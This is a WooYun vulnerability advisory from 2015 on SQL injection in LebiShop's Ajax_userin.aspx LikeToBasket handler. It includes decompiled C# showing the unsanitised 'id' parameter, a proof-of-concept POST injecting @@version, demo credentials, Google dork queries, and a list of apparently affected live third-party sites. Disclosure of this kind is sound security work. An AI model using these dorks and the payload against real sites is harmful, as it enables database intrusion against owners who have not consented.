当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090357

漏洞标题:LebiShop系统sql注入

相关厂商:www.lebi.cn

漏洞作者: hello

提交时间:2015-01-15 10:43

修复时间:2015-04-15 10:44

公开时间:2015-04-15 10:44

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-15: 细节已通知厂商并且等待厂商处理中
2015-01-15: 厂商已经确认,细节仅向厂商公开
2015-01-18: 细节向第三方安全合作伙伴开放
2015-03-11: 细节向核心白帽子及相关领域专家公开
2015-03-21: 细节向普通白帽子公开
2015-03-31: 细节向实习白帽子公开
2015-04-15: 细节向公众公开

简要描述:

官网 http://www.lebi.cn/
demo站点 http://demo.lebi.cn/

详细说明:

用google搜索 关键词 intext:Powered by LebiShop
或者google搜索关键词
Powered by LebiShop inurl:Category.aspx
部分案例

http://168dev.com/lebishop/Category.aspx
http://oa.psy123.com.cn/AllCategories.aspx
http://www.huacaiye.com/Category.aspx?tid=1
http://daiba.com.cn/Category.aspx?id=9
http://hkapp.cn/EN/Category.aspx?id=10
http://54mbb.com/EN/NewsDetails.aspx?id=5
http://shop.lutoog.com/Brand.aspx?id=189
http://queengift.net/EN/Brand.aspx?id=190
http://www.snsrn.com/en/
http://www.skycastle100.com/Search.aspx?keyword=lianyiquan
http://71pg.com/Category.aspx?tid=35
http://www.rft.net.cn/Search.aspx?keyword=[key]&sort=1&page=2
http://lovedou.com/en/
http://www.woofoo51.com/EN/Category.aspx?id=111&pid=0&sort=1&tid=0&page=1
http://newautoch.com/NewsDetails.aspx?id=5
http://memy.cc/
http://www.thanks789.com/Brand.aspx?id=191
http://m.gzyytz.cn/
http://www.thanks789.com/Brand.aspx?id=191


漏洞地址

http://demo.lebi.cn/ajax/Ajax_userin.aspx


public void LikeToBasket()
{
string str = RequestTool.RequestString("id"); //只对单引号进行处理
string str2 = "";
if (str != "")
{
foreach (Lebi_User_Product product in B_Lebi_User_Product.GetList(string.Concat(new object[] { "(Type_id_UserProductType=141 or Type_id_UserProductType=144) and User_id=", base.CurrentUser.id, " and id in (", str, ")" }), "")) //存在注入
{
Lebi_User_Product model = B_Lebi_User_Product.GetModel(string.Concat(new object[] { "User_id=", base.CurrentUser.id, " and product_id=", product.Product_id, " and type_id_UserProductType=142" }));
if (model != null)
{
model.count = product.count;
B_Lebi_User_Product.Update(model);
}
else
{
product.Type_id_UserProductType = 0x8e;
product.count = product.count;
B_Lebi_User_Product.Add(product);
}
}
str2 = string.Concat(new object[] { base.Tag("商品已加入购物车"), "<div>", base.Tag("数量"), " <span>", base.Basket_Product_Count(), "</span> ", base.Tag("件"), " <span>", base.FormatMoney(base.Basket_Product_Price()), "</span></div><div><a href='", base.URL("P_Basket", ""), "' class='btn btn-7'><s></s>", base.Tag("查看购物车"), "</a> <a href='javascript:void(0)' onclick='cloesedialog();' class='btn btn-11'><s></s>", base.Tag("关闭"), "</a></div>" });
}
base.Response.Write(string.Concat(new object[] { "{\"msg\":\"OK\",\"count\":\"", base.Basket_Product_Count(), "\",\"amount\":\"", base.FormatMoney(base.Basket_Product_Price()), "\",\"mes\":\"", str2, "\",\"url\":\"", base.URL("P_AddToBasket", ""), "\"}" }));
}

漏洞证明:

漏洞证明
先注册账号登陆 http://demo.lebi.cn/Register.aspx
test333 密码111111
注册登陆后访问

http://demo.lebi.cn/ajax/Ajax_userin.aspx


post提交

__Action=LikeToBasket&id=@@version


552.png


修复方案:

对id进行处理

版权声明:转载请注明来源 hello@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-01-15 17:09

厂商回复:

感谢关注

最新状态:

暂无